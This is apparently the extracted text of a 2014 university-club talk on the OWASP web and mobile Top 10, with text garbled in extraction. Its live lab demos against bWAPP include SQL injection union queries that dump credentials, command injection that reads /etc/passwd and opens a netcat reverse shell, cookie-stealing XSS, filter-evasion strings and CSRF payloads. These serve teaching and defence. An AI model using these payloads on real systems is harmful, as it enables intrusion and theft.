ACM SIG Security November 18, 2014
Why Talk About So/ware Security? Free Pizza So/ware is Everywhere (Pervasive) All computer security problems are so/ware security problems Even if you don t go into security work, understand the concepts.
About Me Tim MalcomVeKer Spent too much Lme in school BA Sociology, SBU BA Computer Science, UMKC MS InformaLon Assurance, Norwich University S&T PhD Student (unll work + PhD + kids + sleep > 24 hours/day) Former SIG- SEC member So/ware Developer C#, Java, JavaScript, C/C++, Python, Perl, SQL, BASH, PHP, etc. Alphabet Soup CISSP and other cerlficalons Security Consultant FishNet Security
About FishNet Security Founded 1996 NaLon s #1 Security Provider Tremendous Company Growth Revenue, Profit, Employees Based out of Kansas City (Overland Park) Consultants all over the country Work from home! Fortune 500 clients Speakers at Blackhat, DefCon, etc.
FishNet Security is Hiring! If this talk interests you (Or if other security topics are intereslng) Join the largest growing team of security professionals! Junior Consultant Program To bring in more new talent Solve the chicken and egg problem
Overview ü Pizza ü Intros Obligatory Legal Warning So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
Quick Poll Who here has actually hacked a computer system or applicalon? Who here has observed somebody else hacking a system? Who has NEVER done or seen it firsthand?
Obligatory Legal Disclaimer Hacking your own stuff is (probably) not a crime Unauthorized access to others computers IS a Federal Felony or Misdemeanor Get your authorizalon IN WRITING Ask me how I know offline It s no fun to be on the receiving end of an FBI misunderstanding. Ask me how I nevermind. When all else fails hire a good lawyer
Overview ü Pizza ü Intros ü Obligatory Legal Warning So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
So/ware Security Concepts What s Old is New Problems are literally as old as the first systems 1960s 1970s Network Security == So/ware listening on network ports Don t need firewalls; Need CORRECT so/ware design & implementalon Input Vectors == AKack Vectors Security So/ware!= Secure So/ware Security Features!= Secure So/ware
So/ware Security Concepts 2001: AKack a Microso/ Service 1 vuln, exploit many targets 0day: 1 average hacker, 1 work week 2007: AKack a Custom Web ApplicaLon Harder to find vulns in commercial apps 2014: Blended akacks (web/mobile/services) 0day: Team of 5-6 hackers, 1 work month
Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
TesLng Tools: Web Apps Burp Suite (There s a Free EdiLon) hkp://portswigger.net/ Browser Developer Tools/Console Python, Ruby, C#, Java I don t personally rely on automated scanners False posilves Noisy, potenlally disruplve Scanning/Fuzzing is supplementary/code coverage
TesLng Tools: Mobile Burp! Proxy mobile traffic SQLite Read database files ios: iexplorer, ifunbox Jailbroken devices Android: SDK/Eclipse ADB (Android Debugger Bridge) Java Decompilers/Disassemblers Rooted devices
Demo Tools We are going to play with an intenlonally vulnerable web app bwapp Also comes as a pre- configured VM with OS vulnerabililes Download for yourself to learn more: hkp://www.itsecgames.com/
Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
OWASP Top 10 OWASP == ConsorLum to improve So/ware Security Top 10 == List of Most Common So/ware Security Defects Defacto Gold Standard Good for security professionals to know Even beker for developers to know!
OWASP Top 10 2013 1. (SQL, OS, Cmd) InjecLon 2. AuthenLcaLon/Session Management 3. XSS 4. Direct Object References 5. MisconfiguraLon 6. SensiLve Data Exposure 7. Missing FuncLonal Level Access Control 8. CSRF 9. Using Components with Known VulnerabiliLes 10. Unvalidated Redirects/Forwards
A1: InjecLon From OWASP: InjecLon flaws, such as SQL, OS, and LDAP injeclon occur when untrusted data is sent to an interpreter as part of a command or query. The akacker s hoslle data can trick the interpreter into execulng unintended commands or accessing data without proper authorizalon. Remember: Input Vectors are A:ack Vectors
A1: InjecLon Cross Site ScripLng (XSS) is really another form of injeclon HTML/JS InjecLon
A1: InjecLon All InjecLon akacks can be thwarted by judicious use of input validalon.
A1: InjecLon SQL InjecLon is becoming more and more rare (which is a good thing) Likely because of: BeKer development frameworks, tools, libraries Layers of security (server, language, code) Developer awareness Our demo example is likely more simplislc than you will see in the wild
A1: InjecLon C# Example Which is vulnerable? Database database=databasefactory.createdatabase(); String sql1 = "SELECT * from itemtable where itemid = " + itemid; string sql2 = string.format("select * from itemtable where itemid = {0}", itemid); DbCommand command = database.getsqlstringcommand(sql1); DbCommand command = database.getsqlstringcommand(sql2); Answer: Both!
A1: InjecLon C# Example And the fix Parameterized SQL Queries var database = DatabaseFactory.CreateDatabase(); const string sql = "SELECT * from itemtable where itemid = @itemid"; var command = database.getsqlstringcommand(sql); database.addinparameter(command, "ItemID",DbType.Int32, itemid);
A1: InjecLon Stored Procedures are not Magically Safe : CREATE PROCEDURE SP_Search @name varchar(400) = NULL AS DECLARE @sql nvarchar(4000) SELECT @sql = ' SELECT * FROM [People] where [Name] LIKE "' + @name + '"' EXEC (@sql)
A1: Other forms of InjecLon These are not as common as SQL InjecLon LDAP InjecLon: When user input is unintenlonally interpreted as an LDAP (directory) query SaniLze input (similar to SQLI/XSS) and use safe APIs Command InjecLon: More common with PHP/Perl/CGI Open Source/LAMP When user input is unintenlonally interpreted as an OS/ Shell command exec("some_command user $userid pass $pass"); XML/XPATH InjecLon
A1: SQL InjecLon Live Demo hkp://localhost/bwapp/sqli_3.php alice/lovezombies alice/ ' alice/ ' - - alice/ ' or 1=1 - - ' or 'a'='a' - -
A1: SQL InjecLon Live Demo Extract Data! hkp://localhost/bwapp/sqli_1.php hkp://localhost/bwapp/sqli_1.php?ltle=%27 hkp://localhost/bwapp/sqli_1.php?ltle=blah'+or+1=1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah'+union+select+1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,1,1,1,1,1,1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,DATABASE%28%29,2,3,4,5,6- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,column_name,2,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS +where+table_name=%27users%27+and+table_schema=database %28%29- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,login,password,email,secret,1,2+from+users- - %20
A1: Command InjecLon Live Demo hkp://localhost/bwapp/commandi.php www.nsa.gov Concatenate commands: www.nsa.gov; cat /etc/passwd Netcat reverse shell AKacker s shell: nc - lvp 9999 www.nsa.gov; nc - e /bin/sh 127.0.0.1 9999 id cat /etc/passwd
A1: C# Command InjecLon Example private string Command { get { return TextBoxCmd.Text; } } private string Args { get { return Request.Form[ args ]; } } private string Directory { get { return Request.QueryString[ dir ]; } } var process= new System.DiagnosLcs.Process(); process.startinfo.filename = Command; process.startinfo.arguments = Args; process.startinfo.redirectstandardoutput = true; process.startinfo.workingdirectory = Directory; process.start(); var output = process.standardoutput.readtoend();
A2: Broken AuthenLcaLon & Session Management From OWASP: ApplicaLon funclons related to authenlcalon and session management are o/en not implemented correctly, allowing akackers to compromise passwords, keys, or session tokens, or to exploit other implementalon flaws to assume other users idenlles.
A2: More than just Strong Passwords
A2: Broken AuthenLcaLon & Session Management Watch SensiLve cookies Sent over HTTP Missing Secure flag Session IDs not random or not changing at logon Sessions never expiring Session ExpiraLon Logic implemented on the client in JavaScript (bypass that!) Force browse to Admin/AuthenLcated URLs Login Forms sent over HTTP!
A2: Auth/Session Live Demo! hkp://localhost/bwapp/ smgmt_admin_portal.php?admin=0 hkp://localhost/bwapp/ba_logout.php Steal the Session Cookie!
A3: Cross Site ScripLng (XSS) From OWASP: XSS flaws occur whenever an applicalon takes untrusted data and sends it to a web browser without proper validalon or escaping. XSS allows akackers to execute scripts in the viclm s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A3: Cross Site ScripLng Hint: Next slide makes a good interview queslon!
A3: Cross Site ScripLng (XSS) Three main categories of XSS: 1) Reflected XSS An exploit is served up immediately through a vulnerability in an applicalon s page. 2) Persisted (Stored) XSS An exploit is delivered to the applicalon, persisted (typically in SQL), and then served up to a viclm (or usually viclms) at a later point in Lme. 3) DOM XSS An exploit is delivered to client side JavaScript which renders and executes it within the DOM, not necessarily requiring a round- trip to the server.
A3: Cross Site ScripLng (XSS) Declining, but not gone Typical current examples require bypassing filters Really just another form of InjecLon Inject HTML/JS into an app
A3: Cross Site ScripLng (XSS) Blacklist vs Whitelist Whitelist is beker, but o/en harder to know EASY BUTTON: HtmlEncode() when wrilng user input to the browser Don t forget Query String or Cookie Params! All input vectors are? Use libraries to make this automalc!
A3: Cross Site ScripLng (XSS) Whitelists == Regular Expressions
A3: XSS Example ASP.NET SomeLabel.Text = Request["Name"]; SomeLabel.Text = Request.QueryString["Name"]; SomeLabel.Text = Request.Cookies[ Cookie"].Value; All Vulnerable!
A3: XSS Example ASP.NET string Name { get { return Server.HtmlEncode(Textbox1.Text); } } SomeLabel.Text = "Welcome " + Name; Vulnerable?
A3: XSS Example MVC View C# <div class= MyContent"> <%= Model.Content1 %> <%: Model.Content2 %> <%= Server.HtmlEncode(Model.Content3) %> <%= Html.TextBoxFor(model=>model.Content4) %> <%: Html.TextBoxFor(model=>model.Content5) %> <%= Html.Raw(model.Content6) %> </div> Which content may be vulnerable to XSS? Hint: IHtmlString
A3: XSS Example MVC View JS <script type="text/javascript"> $(funclon(){ var orderid = '<%= ViewData["orderId"] %>'; $('#orderid').hide().html(orderid).show('slow'); var actorid = '<%= ViewData[ actorid"] %>'; $('#actorid').hide().text(actorid).show('slow'); }); </script> Vulnerable? Hint:.html()
A3: Reflected XSS Demo! hkp://localhost/bwapp/htmli_post.php Joe Schmoe<script>alert('xss')</script> Joe Schmoe<script>document.locaLon='hKp:// www.google.com/?q='+document.cookie</script> hkp://localhost/bwapp/htmli_get.php? firstname=joe&lastname=schmoe%3cscript %3Ealert%28%27xss%27%29%3C%2Fscript %3E
A3: Persisted (Stored) XSS Demo! hkp://localhost/bwapp/htmli_stored.php <script>var c=document.cookie.replace(" ","+"); document.write("what about this? <img src=hkp://www.google.com/?q="+c);</ script>
A3: XSS Filter Evasion <scr<script>ipt>alert(0)</scr</script>ipt> <ScRiPt>alert(0)</sCrIpT> <img src=# onmouseover="alert(0)"> hkps://www.owasp.org/index.php/ XSS_Filter_Evasion_Cheat_Sheet
A4: Insecure Direct Object References From OWASP: A direct object reference occurs when a developer exposes a reference to an internal implementalon object, such as a file, directory, or database key. Without an access control check or other proteclon, akackers can manipulate these references to access unauthorized data.
A4: Insecure Direct Object Example public int GenerateAwardNumber() { var prev = GetPreviousIssuedAwardNumber(); return prev++; } Vulnerable to Forced Browsing (guessing IDs)
A4: Insecure Direct Object Example Directory lislng of web root: ForgotPassword.aspx Default.aspx Login.jsp /Admin Passwords.txt Vulnerable to Forced Browsing (guessing URLs)
A4: Insecure Direct Object Anecdote From a client engagement this past summer URL encoded parameter like /viewreport.aspx?u=%5c %5cserver%5cshare%5cfile.pdf Decodes as: \\server\share\file.pdf How about this instead? /viewreport.aspx?u=c%3a%5cinetpub%5cwwwroot %5cweb.config I made the app give me all source.aspx pages + all compiled DLLs referenced by.aspx pages + config! Reflected the.net DLLs to C# source Pwned all source + Lme == found more vulns in code!
A4: Direct Object Reference Live Demo! hkp://localhost/bwapp/ insecure_direct_object_ref_2.php
A5: Security MisconfiguraLon From OWASP: Good security requires having a secure configuralon defined and deployed for the applicalon, frameworks, applicalon server, web server, database server, and pla orm. Secure sešngs should be defined, implemented, and maintained, as defaults are o/en insecure. AddiLonally, so/ware should be kept up to date.
A5: Security MisconfiguraLon It happens. Read the manual. bwapp has examples.
A6: SensiLve Data Exposure From OWASP: Many web applicalons do not properly protect sensilve data, such as credit cards, tax IDs, and authenlcalon credenlals. AKackers may steal or modify such weakly protected data to conduct credit card fraud, idenlty the/, or other crimes. SensiLve data deserves extra proteclon such as encryplon at rest or in transit, as well as special precaulons when exchanged with the browser.
A6: SensiLve Data Exposure Use HTTPS Use a well designed/reviewed Crypto API Or be careful and Use industry accepted algorithms Use industry accepted Key Lengths Salt Your Hashes What s your IniLalizaLon Vector, Victor? Who has access to the keys?
A6: SensiLve Data Exposure Turn on HTTPS Use good (strong and non- expired) cerlficates Once you go HTTPS, don t revert to HTTP All objects in the page should use HTTPS
A6: SensiLve Data SoluLons Or beker yet Do you have to keep that sensilve data? Not processing/storing sensilve data is a VALID oplon Credit Card TokenizaLon
A6: SensiLve Data Exposure The main benefit to encryplng sensilve values in the DB is for another layer against SQL InjecLon. UserID: jon' union select ExpiraLonMonth, Number, FullName from CreditCard where ExpiraLonYear = '2012' - - If Number is encrypted, this SQL InjecLon akack has less bite When the applicalon accesses the Number, decryplon happens in applicalon layer code with a key the akacker doesn t have.
A6: SensiLve Data Exposure Remember: Don t roll your own Security Features Remember: Don t roll your own Crypto
A7: Missing FuncLon Level From OWASP: Access Control Most web applicalons verify funclon level access rights before making that funclonality visible in the UI. However, applicalons need to perform the same access control checks on the server when each funclon is accessed. If requests are not verified, akackers will be able to forge requests in order to access funclonality without proper authorizalon.
A7: Missing FuncLon Level Access Control Never assume a user is authenlcated! Corollary: Always check for authenlcalon if (user.isauthenlcated()) { } ValidaLon Rule #1: Validate on the Client for UX ValidaLon Rule #2: Validate on the Server for Security Especially important in Services, AJAX
A7: Missing FuncLon Level Access Control Another recent client anecdote Modern web app leverages RESTful/JSON services User login form sends credenlals over HTTPS to service Service responds with results in JSON format All access control was wriken on the CLIENT in JavaScript! Simply proxy the server response, edit with Yes I am the Administrator The client side JS took care of the rest.
A8: Cross Site Request Forgery (CSRF) From OWASP: A CSRF akack forces a logged- on viclm s browser to send a forged HTTP request, including the viclm s session cookie and any other automalcally included authenlcalon informalon, to a vulnerable web applicalon. This allows the akacker to force the viclm s browser to generate requests the vulnerable applicalon thinks are legilmate requests from the viclm. Dropped from #5 in 2010
A8: Cross Site Request Forgery (CSRF) Pronounced Sea- Surf One of the hardest akack models to understand I find this one OFTEN and even in Commercial Web ApplicaLon Products O/en combined with XSS (client side script to force the viclm s browser to do something)
A8: CSRF SoluLons SensiLve TransacLons should not use GET Note: SensiLve TransacLons via POST can slll be exploited with combined XSS Use a library that will handle adding nonces to your forms. NONCE == Number Used Once MVC: AnL- Forgery Tokens A random number token that is temporarily persisted in session/state/memory/disk on the server and added as a hidden form parameter <input type=hidden name= validator" value="982743660152">
A8: CSRF SoluLons - Nonces MVC s AnL- Forgery Token HTML: @using (Html.BeginForm("Manage", "Account")) { } @Html.AnLForgeryToken()
A8: MVC AnL- Forgery Tokens With AJAX:
A8: MVC AnL- Forgery Tokens ValidaLon:
A8: CSRF Live Demo! hkp://localhost/bwapp/csrf_1.php hkp://localhost/bwapp/csrf_2.php Combine with XSS! hkp://localhost/bwapp/htmli_stored.php <script>document.write("thanks for making a donalon! <img src=/bwapp/csrf_2.php? account=123-45678- 90&amount=500&acLon=tra nsfer");</script>
A8: CSRF Live POST Demo! hkp://localhost/bwapp/csrf_3.php hkp://localhost/bwapp/htmli_stored.php Secrets are changed! <script> var xhr = new XMLHKpRequest(); xhr.open('post', '/bwapp/csrf_3.php', true); xhr.setrequestheader('content- type', 'applicalon/x- www- form- urlencoded'); xhr.onload = funclon () { // do something to response console.log(this.responsetext); }; xhr.send('secret=shhh&login=bee&aclon=change'); </script>
A9: Using Known Vulnerable Components From OWASP: Components, such as libraries, frameworks, and other so/ware modules, almost always run with full privileges. If a vulnerable component is exploited, such an akack can facilitate serious data loss or server takeover. ApplicaLons using components with known vulnerabililes may undermine applicalon defenses and enable a range of possible akacks and impacts.
A9: Using Known Vulnerable Components Keep libraries up to date Track old stuff that needs updalng as Technical Debt Wrap 3 rd party libraries to help migralon to new/different libraries in the future
A10: Unvalidated Redirects and From OWASP: Forwards Web applicalons frequently redirect and forward users to other pages and websites, and use untrusted data to determine the deslnalon pages. Without proper validalon, akackers can redirect viclms to phishing or malware sites, or use forwards to access unauthorized pages.
A10: Redirect Live Demo! hkp://localhost/bwapp/ unvalidated_redir_fwd_1.php hkp://localhost/bwapp/ unvalidated_redir_fwd_1.php?url=hkp%3a %2F%2Fwww.google.com hkp://localhost/bwapp/ unvalidated_redir_fwd_2.php? ReturnUrl=portal.php
OWASP Recap 1. (SQL, OS, Cmd) InjecLon 2. AuthenLcaLon/Session Management 3. XSS 4. Direct Object References 5. MisconfiguraLon 6. SensiLve Data Exposure 7. Missing FuncLonal Level Access Control 8. CSRF 9. Using Components with Known VulnerabiliLes 10. Unvalidated Redirects/Forwards
Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
OWASP Mobile Top 10 1. Weak Server Side Controls 2. Insecure Data Storage 3. Insufficient TransportaLon Layer ProtecLon 4. Unintended Data Leakage 5. Poor AuthorizaLon and AuthenLcaLon 6. Broken Cryptography 7. Client Side InjecLon 8. Security Decisions via Untrusted Inputs 9. Improper Session Handling 10. Lack of Binary ProtecLons hkps://www.owasp.org/index.php/projects/ OWASP_Mobile_Security_Project_- _Top_Ten_Mobile_Risks
OWASP Mobile Top 10 #1 Weak Server Side Controls All the Stuff we just talked about (OWASP s regular Top 10)
OWASP Mobile Top 10 #2 Insecure Data Storage Users can manipulate the device s file system
OWASP Mobile Top 10 #3 Insufficient Transport Layer ProtecLon Use TLS/SSL just like everything else
OWASP Mobile Top 10 #4 Unintended Data Leakage Logging Caching HTML5 storage Buffers (Copy/Paste) Key Presses 3 rd Party AnalyLcs
OWASP Mobile Top 10 #5 Poor AuthorizaLon and AuthenLcaLon Match the web app Consider stolen device scenarios Convenience vs. Security (remember me)
OWASP Mobile Top 10 #6 Broken Crypto Don t roll your own Remember #2 Users can access keys on file system And no compiling the key into the binary does not hide it.
OWASP Mobile Top 10 #7 Client Side InjecLon SQL InjecLon on the client (SQLite) Local File Inclusion or Command InjecLon XSS/JS if mobile app is based on HTML (and most are) Buffer Overflows Yep, what s old is new again
OWASP Mobile Top 10 #8 Security Decisions via Untrusted Inputs ios IPC (Inter Process CommunicaLon) Input Vectors are?
OWASP Mobile Top 10 #9 Improper Session Handling Same as with web apps: Timeouts Invalidate on the server, not just the client Rotate Cookies upon authenlcalon Protect session data
OWASP Mobile Top 10 #10 Lack of Binary ProtecLons Good luck with this one Make disassembly difficult Encrypted app code (ios) Code obfuscalon (packing) Crypto checksums (probably not effeclve) Jailbreak/Debug deteclon (just a speed bump)
Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too ü OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too ü OWASP s Mobile Top 10 ü XKCD AppreciaLon ü Sprinkled Throughout
QuesLons? malcomveker _shi/2_ gmail.com Lm.malcomveKer _shi/2_ fishnetsecurity.com